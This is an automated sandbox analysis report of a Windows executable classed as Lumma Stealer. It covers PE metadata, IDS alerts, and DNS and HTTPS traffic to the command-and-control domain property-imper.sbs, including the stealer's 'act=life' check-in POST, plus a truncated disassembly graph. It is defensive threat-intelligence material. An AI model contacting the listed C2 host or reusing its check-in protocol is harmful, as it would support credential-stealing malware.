        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        104.21.33.116
        		property-imper.sbsUnited States
        		13335CLOUDFLARENETUSfalse

        General Information

        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1561682
        Start date and time:2024-11-24 04:19:13 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 4m 51s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:7
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:file.exe
        Detection:MAL
        Classification:mal100.evad.winEXE@1/0@1/1
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:Failed
        Cookbook Comments:
        • Found application associated with file extension: .exe

        Warnings

        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.

        Simulations

        Behavior and APIs

        TimeTypeDescription
        22:20:24API Interceptor2x Sleep call for process: file.exe modified

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        104.21.33.116file.exeGet hashmaliciousLummaC StealerBrowse
          file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
            file.exeGet hashmaliciousLummaC StealerBrowse
              file.exeGet hashmaliciousUnknownBrowse
                file.exeGet hashmaliciousUnknownBrowse
                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                    file.exeGet hashmaliciousLummaC StealerBrowse
                      file.exeGet hashmaliciousLummaC StealerBrowse
                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          file.exeGet hashmaliciousLummaC StealerBrowse

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            property-imper.sbsfile.exeGet hashmaliciousLummaC StealerBrowse
                            • 104.21.33.116
                            file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                            • 104.21.33.116
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 104.21.33.116
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 172.67.162.84
                            file.exeGet hashmaliciousUnknownBrowse
                            • 104.21.33.116
                            file.exeGet hashmaliciousUnknownBrowse
                            • 104.21.33.116
                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                            • 104.21.33.116
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 104.21.33.116
                            2fQ8fpTWAP.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                            • 172.67.162.84
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 104.21.33.116

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            CLOUDFLARENETUSsparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                            • 172.65.2.111
                            powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                            • 172.66.116.184
                            x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                            • 1.8.81.73
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 104.21.33.116
                            x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                            • 104.29.231.51
                            file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                            • 104.21.33.116
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 104.21.33.116
                            313e4225be01a2f968dd52e4e8c0b9fd08c906289779b.exeGet hashmaliciousUnknownBrowse
                            • 104.26.13.205
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 172.67.162.84
                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                            • 172.64.41.3

                            JA3 Fingerprints

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC StealerBrowse
                            • 104.21.33.116
                            file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                            • 104.21.33.116
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 104.21.33.116
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 104.21.33.116
                            file.exeGet hashmaliciousUnknownBrowse
                            • 104.21.33.116
                            file.exeGet hashmaliciousUnknownBrowse
                            • 104.21.33.116
                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                            • 104.21.33.116
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 104.21.33.116
                            file.exeGet hashmaliciousCryptbotBrowse
                            • 104.21.33.116
                            2fQ8fpTWAP.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                            • 104.21.33.116

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.947908277655611
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'852'416 bytes
                            MD5:64f25a20bc6a8730e6d230e5d63dac8e
                            SHA1:f1c8a90fefc9e7789013cf9228827634ad8410f3
                            SHA256:daa2f6c445600573a591de7b8ad352699dcc9ff8b5bd2e1a6f93dc373572ceae
                            SHA512:4b0e9001c5304b3deee2dd463ab5d310cf61423d773983994167093299878f28833772a746336aaa583b036a7a6510051602bc2064f7df983ae5999aae487c87
                            SSDEEP:49152:q7Mtz/HGSALlVti6nGA+AkQ7G1x/ILNyIYvRdu:qqbmSW3EZuiD
                            TLSH:E28533CC8E02FD70C2BE8535844AB31EBB38DCF158BD26EFB3502526D613658616E56E
                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g..............................I...........@...........................I.....6.....@.................................\...p..

                            File Icon

                            Icon Hash:00928e8e8686b000

                            Static PE Info

                            General

                            Entrypoint:0x898000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:0
                            File Version Major:6
                            File Version Minor:0
                            Subsystem Version Major:6
                            Subsystem Version Minor:0
                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                            Entrypoint Preview

                            Instruction
                            jmp 00007F66E8D5E1EAh

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x5805c0x70.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x2b0.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x581f80x8.idata
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            0x10000x560000x262006253811cdcd28d17091c7ab8897cbf63False0.9992955942622951data7.981115903907639IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc0x570000x2b00x2004b57f33bfb85398191260ea9fdc1b831False0.80078125data6.087687787872282IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata 0x580000x10000x200c92ced077364b300efd06b14c70a61dcFalse0.15625data1.1194718105633323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            0x590000x2a30000x200e4a100c337094fa20742734db6440bc2unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            olszqzdv0x2fc0000x19b0000x19a6002609589a8d0da679dff1895e18ae441bFalse0.9941287265839172data7.953205529312231IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            iwdrpyuy0x4970000x10000x4009212de3055059128c0cef2d17cd6609cFalse0.7587890625data6.056543629374982IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .taggant0x4980000x30000x2200a14bbb075c237d2d6900fe6eeae98485False0.0646829044117647DOS executable (COM)0.7675560772419018IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                            Resources

                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_MANIFEST0x4963500x256ASCII text, with CRLF line terminators0.5100334448160535

                            Imports

                            DLLImport
                            kernel32.dlllstrcpy

                            Network Behavior

                            Suricata IDS Alerts

                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-11-24T04:20:24.488324+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749709104.21.33.116443TCP
                            2024-11-24T04:20:25.409417+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749709104.21.33.116443TCP
                            2024-11-24T04:20:25.409417+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749709104.21.33.116443TCP
                            2024-11-24T04:20:26.779861+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749715104.21.33.116443TCP

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Nov 24, 2024 04:20:23.215914011 CET49709443192.168.2.7104.21.33.116
                            Nov 24, 2024 04:20:23.215971947 CET44349709104.21.33.116192.168.2.7
                            Nov 24, 2024 04:20:23.216052055 CET49709443192.168.2.7104.21.33.116
                            Nov 24, 2024 04:20:23.219455004 CET49709443192.168.2.7104.21.33.116
                            Nov 24, 2024 04:20:23.219475031 CET44349709104.21.33.116192.168.2.7
                            Nov 24, 2024 04:20:24.488234043 CET44349709104.21.33.116192.168.2.7
                            Nov 24, 2024 04:20:24.488323927 CET49709443192.168.2.7104.21.33.116
                            Nov 24, 2024 04:20:24.491309881 CET49709443192.168.2.7104.21.33.116
                            Nov 24, 2024 04:20:24.491348028 CET44349709104.21.33.116192.168.2.7
                            Nov 24, 2024 04:20:24.491904020 CET44349709104.21.33.116192.168.2.7
                            Nov 24, 2024 04:20:24.542104006 CET49709443192.168.2.7104.21.33.116
                            Nov 24, 2024 04:20:24.542166948 CET49709443192.168.2.7104.21.33.116
                            Nov 24, 2024 04:20:24.542228937 CET44349709104.21.33.116192.168.2.7
                            Nov 24, 2024 04:20:25.409437895 CET44349709104.21.33.116192.168.2.7
                            Nov 24, 2024 04:20:25.409568071 CET44349709104.21.33.116192.168.2.7
                            Nov 24, 2024 04:20:25.409751892 CET49709443192.168.2.7104.21.33.116
                            Nov 24, 2024 04:20:25.491854906 CET49709443192.168.2.7104.21.33.116
                            Nov 24, 2024 04:20:25.491887093 CET44349709104.21.33.116192.168.2.7
                            Nov 24, 2024 04:20:25.553128004 CET49715443192.168.2.7104.21.33.116
                            Nov 24, 2024 04:20:25.553169966 CET44349715104.21.33.116192.168.2.7
                            Nov 24, 2024 04:20:25.553252935 CET49715443192.168.2.7104.21.33.116
                            Nov 24, 2024 04:20:25.553544044 CET49715443192.168.2.7104.21.33.116
                            Nov 24, 2024 04:20:25.553559065 CET44349715104.21.33.116192.168.2.7
                            Nov 24, 2024 04:20:26.779860973 CET49715443192.168.2.7104.21.33.116

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Nov 24, 2024 04:20:22.791620016 CET5437053192.168.2.71.1.1.1
                            Nov 24, 2024 04:20:23.208076000 CET53543701.1.1.1192.168.2.7

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Nov 24, 2024 04:20:22.791620016 CET192.168.2.71.1.1.10x2bffStandard query (0)property-imper.sbsA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Nov 24, 2024 04:20:23.208076000 CET1.1.1.1192.168.2.70x2bffNo error (0)property-imper.sbs104.21.33.116A (IP address)IN (0x0001)false
                            Nov 24, 2024 04:20:23.208076000 CET1.1.1.1192.168.2.70x2bffNo error (0)property-imper.sbs172.67.162.84A (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • property-imper.sbs

                            HTTPS Proxied Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.749709104.21.33.1164436444C:\Users\user\Desktop\file.exe
                            TimestampBytes transferredDirectionData
                            2024-11-24 03:20:24 UTC265OUTPOST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 8
                            Host: property-imper.sbs
                            2024-11-24 03:20:24 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                            Data Ascii: act=life
                            2024-11-24 03:20:25 UTC1010INHTTP/1.1 200 OK
                            Date: Sun, 24 Nov 2024 03:20:25 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Set-Cookie: PHPSESSID=k80ojalprr2p79jgr8v1ajodr4; expires=Wed, 19-Mar-2025 21:07:04 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            cf-cache-status: DYNAMIC
                            vary: accept-encoding
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6kfq7MgnnMPSHThkvlyDHnz6kf7N40ygtPUztcotCeKXr3t9lP9o1W%2BlK5UpbciijVR4SYAsXWJkWJndAECj%2BZzC9qYt0MYunmm5RJZJgTZamNhK9jW8dl1wvwWVpC72yyqHRqY%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8e764352ca02efa7-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1784&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1586094&cwnd=79&unsent_bytes=0&cid=2a30c319e3db10fe&ts=938&x=0"
                            2024-11-24 03:20:25 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                            Data Ascii: 2ok
                            2024-11-24 03:20:25 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            System Behavior

                            General

                            Target ID:1
                            Start time:22:20:17
                            Start date:23/11/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0x580000
                            File size:1'852'416 bytes
                            MD5 hash:64F25A20BC6A8730E6D230E5D63DAC8E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:3.4%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:65.7%
                              Total number of Nodes:230
                              Total number of Limit Nodes:13
                              execution_graph 6576 58e0d8 6577 58e100 6576->6577 6579 58e16e 6577->6579 6592 5bdf70 LdrInitializeThunk 6577->6592 6581 58e22e 6579->6581 6593 5bdf70 LdrInitializeThunk 6579->6593 6594 5a5e90 6581->6594 6583 58e29d 6602 5a6190 6583->6602 6585 58e2bd 6612 5a7e20 6585->6612 6589 58e2e6 6632 5a8c90 6589->6632 6591 58e2ef 6592->6579 6593->6581 6595 5a5f30 6594->6595 6595->6595 6596 5a60b5 6595->6596 6597 5a6026 6595->6597 6601 5a6020 6595->6601 6641 5c0f60 6595->6641 6600 5a1790 2 API calls 6596->6600 6635 5a1790 6597->6635 6600->6601 6601->6583 6603 5a619e 6602->6603 6674 5c0b70 6603->6674 6605 5a6020 6605->6585 6606 5c0f60 2 API calls 6611 5a5fe0 6606->6611 6607 5a60b5 6607->6607 6610 5a1790 2 API calls 6607->6610 6608 5a6026 6609 5a1790 2 API calls 6608->6609 6609->6607 6610->6605 6611->6605 6611->6606 6611->6607 6611->6608 6613 5a80a0 6612->6613 6616 5a7e4c 6612->6616 6621 58e2dd 6612->6621 6623 5a80d7 6612->6623 6679 5bded0 6613->6679 6615 5c0f60 2 API calls 6615->6616 6616->6613 6616->6615 6617 5c0b70 LdrInitializeThunk 6616->6617 6616->6621 6616->6623 6617->6616 6618 5c0b70 LdrInitializeThunk 6618->6623 6624 5a8770 6621->6624 6622 5bdf70 LdrInitializeThunk 6622->6623 6623->6618 6623->6621 6623->6622 6683 5c0c80 6623->6683 6691 5c1580 6623->6691 6625 5a87a0 6624->6625 6626 5a882e 6625->6626 6703 5bdf70 LdrInitializeThunk 6625->6703 6628 5bb7e0 RtlAllocateHeap 6626->6628 6631 5a895e 6626->6631 6629 5a88b1 6628->6629 6629->6631 6704 5bdf70 LdrInitializeThunk 6629->6704 6631->6589 6705 5a8cb0 6632->6705 6634 5a8c99 6634->6591 6636 5a17a0 6635->6636 6636->6636 6637 5a183e 6636->6637 6639 5a1861 6636->6639 6649 5c0610 6636->6649 6637->6596 6639->6637 6653 5a3d70 6639->6653 6642 5c0f90 6641->6642 6645 5c0fde 6642->6645 6672 5bdf70 LdrInitializeThunk 6642->6672 6643 5bb7e0 RtlAllocateHeap 6646 5c101f 6643->6646 6645->6643 6648 5c10ae 6645->6648 6646->6648 6673 5bdf70 LdrInitializeThunk 6646->6673 6648->6595 6650 5c0630 6649->6650 6651 5c075e 6650->6651 6665 5bdf70 LdrInitializeThunk 6650->6665 6651->6639 6654 5c0480 LdrInitializeThunk 6653->6654 6656 5a3db0 6654->6656 6655 5a44c3 6655->6637 6656->6655 6666 5bb7e0 6656->6666 6659 5a3dee 6663 5a3e7c 6659->6663 6669 5bdf70 LdrInitializeThunk 6659->6669 6660 5bb7e0 RtlAllocateHeap 6660->6663 6661 5a4427 6661->6655 6671 5bdf70 LdrInitializeThunk 6661->6671 6663->6660 6663->6661 6663->6663 6670 5bdf70 LdrInitializeThunk 6663->6670 6665->6651 6667 5bb800 6666->6667 6667->6667 6668 5bb83f RtlAllocateHeap 6667->6668 6668->6659 6669->6659 6670->6663 6671->6661 6672->6645 6673->6648 6675 5c0b90 6674->6675 6676 5c0c4f 6675->6676 6678 5bdf70 LdrInitializeThunk 6675->6678 6676->6611 6678->6676 6680 5bdf3e 6679->6680 6682 5bdeea 6679->6682 6681 5bb7e0 RtlAllocateHeap 6680->6681 6681->6682 6682->6623 6684 5c0cb0 6683->6684 6684->6684 6685 5c0cfe 6684->6685 6699 5bdf70 LdrInitializeThunk 6684->6699 6687 5bb7e0 RtlAllocateHeap 6685->6687 6690 5c0e0f 6685->6690 6688 5c0d8b 6687->6688 6688->6690 6700 5bdf70 LdrInitializeThunk 6688->6700 6690->6623 6690->6690 6692 5c1591 6691->6692 6693 5c163e 6692->6693 6701 5bdf70 LdrInitializeThunk 6692->6701 6695 5bb7e0 RtlAllocateHeap 6693->6695 6697 5c17de 6693->6697 6696 5c16ae 6695->6696 6696->6697 6702 5bdf70 LdrInitializeThunk 6696->6702 6697->6623 6699->6685 6700->6690 6701->6693 6702->6697 6703->6626 6704->6631 6706 5a8d10 6705->6706 6706->6706 6715 5bb8e0 6706->6715 6708 5a8d6d 6708->6634 6710 5a8d45 6710->6708 6713 5a8e66 6710->6713 6723 5bbb20 6710->6723 6727 5bc040 6710->6727 6714 5a8ece 6713->6714 6735 5bbfa0 6713->6735 6714->6634 6716 5bb900 6715->6716 6717 5bb93e 6716->6717 6739 5bdf70 LdrInitializeThunk 6716->6739 6718 5bb7e0 RtlAllocateHeap 6717->6718 6722 5bba1f 6717->6722 6720 5bb9c5 6718->6720 6720->6722 6740 5bdf70 LdrInitializeThunk 6720->6740 6722->6710 6724 5bbbce 6723->6724 6725 5bbb31 6723->6725 6724->6710 6725->6724 6741 5bdf70 LdrInitializeThunk 6725->6741 6728 5bc090 6727->6728 6731 5bc0d8 6728->6731 6742 5bdf70 LdrInitializeThunk 6728->6742 6729 5bc73e 6729->6710 6731->6729 6732 5bc6cf 6731->6732 6734 5bdf70 LdrInitializeThunk 6731->6734 6732->6729 6743 5bdf70 LdrInitializeThunk 6732->6743 6734->6731 6736 5bbfc0 6735->6736 6738 5bc00e 6736->6738 6744 5bdf70 LdrInitializeThunk 6736->6744 6738->6713 6739->6717 6740->6722 6741->6724 6742->6731 6743->6729 6744->6738 6769 599130 6770 5bb8e0 2 API calls 6769->6770 6771 599158 6770->6771 6795 59db30 6796 59db70 6795->6796 6799 58b210 6796->6799 6800 58b2a0 6799->6800 6800->6800 6801 58b2d6 6800->6801 6802 5bded0 RtlAllocateHeap 6800->6802 6802->6800 6549 58ceb3 CoInitializeSecurity 6550 58d7d3 CoUninitialize 6551 58d7da 6550->6551 6571 58dc33 6572 58dcd0 6571->6572 6572->6572 6573 58dd4e 6572->6573 6575 5bdf70 LdrInitializeThunk 6572->6575 6575->6573 6803 58c32b 6804 5bded0 RtlAllocateHeap 6803->6804 6805 58c338 6804->6805 6756 58e88f 6757 58e88e 6756->6757 6757->6756 6759 58e89c 6757->6759 6762 5bdf70 LdrInitializeThunk 6757->6762 6761 58e948 6759->6761 6763 5bdf70 LdrInitializeThunk 6759->6763 6762->6759 6763->6761 6498 5889a0 6502 5889af 6498->6502 6499 588cb3 ExitProcess 6500 588cae 6507 5bdeb0 6500->6507 6502->6499 6502->6500 6506 58ce80 CoInitializeEx 6502->6506 6510 5bf460 6507->6510 6509 5bdeb5 FreeLibrary 6509->6499 6511 5bf469 6510->6511 6511->6509 6512 5a1960 6513 5a19d8 6512->6513 6518 599530 6513->6518 6515 5a1a84 6516 599530 LdrInitializeThunk 6515->6516 6517 5a1b29 6516->6517 6519 599560 6518->6519 6530 5c0480 6519->6530 6521 599756 6527 599783 6521->6527 6528 5996ca 6521->6528 6534 5c0880 6521->6534 6522 59974b 6540 5c07b0 6522->6540 6523 59962e 6523->6521 6523->6522 6524 5c0480 LdrInitializeThunk 6523->6524 6523->6527 6523->6528 6524->6523 6527->6528 6544 5bdf70 LdrInitializeThunk 6527->6544 6528->6515 6532 5c04a0 6530->6532 6531 5c05be 6531->6523 6532->6531 6545 5bdf70 LdrInitializeThunk 6532->6545 6535 5c08b0 6534->6535 6538 5c08fe 6535->6538 6546 5bdf70 LdrInitializeThunk 6535->6546 6536 5c09ae 6536->6527 6538->6536 6547 5bdf70 LdrInitializeThunk 6538->6547 6542 5c07e0 6540->6542 6541 5c082e 6541->6521 6542->6541 6548 5bdf70 LdrInitializeThunk 6542->6548 6544->6528 6545->6531 6546->6538 6547->6536 6548->6541 6772 58de02 6774 58de30 6772->6774 6773 58de9e 6774->6773 6776 5bdf70 LdrInitializeThunk 6774->6776 6776->6773 6552 5bb7e0 6553 5bb800 6552->6553 6553->6553 6554 5bb83f RtlAllocateHeap 6553->6554 6745 5bbce0 6746 5bbd5a 6745->6746 6747 5bbcf2 6745->6747 6747->6746 6750 5bbd52 6747->6750 6753 5bdf70 LdrInitializeThunk 6747->6753 6749 5bbede 6749->6746 6749->6749 6755 5bdf70 LdrInitializeThunk 6749->6755 6750->6749 6754 5bdf70 LdrInitializeThunk 6750->6754 6753->6750 6754->6749 6755->6746 6777 5c0a00 6779 5c0a30 6777->6779 6778 5c0a7e 6780 5c0b2e 6778->6780 6784 5bdf70 LdrInitializeThunk 6778->6784 6779->6778 6783 5bdf70 LdrInitializeThunk 6779->6783 6783->6778 6784->6780 6785 5c02c0 6786 5c02e0 6785->6786 6787 5c041e 6786->6787 6789 5bdf70 LdrInitializeThunk 6786->6789 6789->6787 6555 58cf05 6556 58cf20 6555->6556 6561 5b9030 6556->6561 6558 58cf7a 6559 5b9030 5 API calls 6558->6559 6560 58d3ca 6559->6560 6562 5b9090 6561->6562 6562->6562 6563 5b91b1 SysAllocString 6562->6563 6567 5b966a 6562->6567 6565 5b91df 6563->6565 6564 5b969c GetVolumeInformationW 6569 5b96ba 6564->6569 6566 5b91ea CoSetProxyBlanket 6565->6566 6565->6567 6566->6567 6570 5b920a 6566->6570 6567->6564 6568 5b9658 SysFreeString SysFreeString 6568->6567 6569->6558 6570->6568

                              Executed Functions

                              Function 005B9030 Relevance: 21.6, APIs: 5, Strings: 7, Instructions: 629memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 5b9030-5b9089 1 5b9090-5b90c6 0->1 1->1 2 5b90c8-5b90e4 1->2 4 5b90f1-5b913f 2->4 5 5b90e6 2->5 7 5b968c-5b96b8 call 5bf9a0 GetVolumeInformationW 4->7 8 5b9145-5b9177 4->8 5->4 13 5b96ba 7->13 14 5b96bc-5b96df call 5a0650 7->14 9 5b9180-5b91af 8->9 9->9 11 5b91b1-5b91e4 SysAllocString 9->11 18 5b91ea-5b9204 CoSetProxyBlanket 11->18 19 5b9674-5b9688 11->19 13->14 20 5b96e0-5b96e8 14->20 21 5b966a-5b9670 18->21 22 5b920a-5b9225 18->22 19->7 20->20 23 5b96ea-5b96ec 20->23 21->19 25 5b9230-5b9262 22->25 26 5b96fe-5b972d call 5a0650 23->26 27 5b96ee-5b96fb call 588330 23->27 25->25 28 5b9264-5b92df 25->28 35 5b9730-5b9738 26->35 27->26 36 5b92e0-5b930b 28->36 35->35 37 5b973a-5b973c 35->37 36->36 38 5b930d-5b933d 36->38 39 5b974e-5b977d call 5a0650 37->39 40 5b973e-5b974b call 588330 37->40 49 5b9658-5b9668 SysFreeString * 2 38->49 50 5b9343-5b9365 38->50 46 5b9780-5b9788 39->46 40->39 46->46 48 5b978a-5b978c 46->48 51 5b979e-5b97cb call 5a0650 48->51 52 5b978e-5b979b call 588330 48->52 49->21 57 5b964b-5b9655 50->57 58 5b936b-5b936e 50->58 61 5b97d0-5b97d8 51->61 52->51 57->49 58->57 60 5b9374-5b9379 58->60 60->57 63 5b937f-5b93cf 60->63 61->61 64 5b97da-5b97dc 61->64 69 5b93d0-5b9416 63->69 65 5b97ee-5b97f5 64->65 66 5b97de-5b97eb call 588330 64->66 66->65 69->69 71 5b9418-5b942d 69->71 72 5b9431-5b9433 71->72 73 5b9439-5b943f 72->73 74 5b9636-5b9647 72->74 73->74 75 5b9445-5b9452 73->75 74->57 76 5b948d 75->76 77 5b9454-5b9459 75->77 80 5b948f-5b94b7 call 5882b0 76->80 79 5b946c-5b9470 77->79 81 5b9472-5b947b 79->81 82 5b9460 79->82 90 5b95e8-5b95f9 80->90 91 5b94bd-5b94cb 80->91 86 5b947d-5b9480 81->86 87 5b9482-5b9486 81->87 85 5b9461-5b946a 82->85 85->79 85->80 86->85 87->85 89 5b9488-5b948b 87->89 89->85 92 5b95fb 90->92 93 5b9600-5b960c 90->93 91->90 94 5b94d1-5b94d5 91->94 92->93 96 5b960e 93->96 97 5b9613-5b9633 call 5882e0 call 5882c0 93->97 95 5b94e0-5b94ea 94->95 98 5b94ec-5b94f1 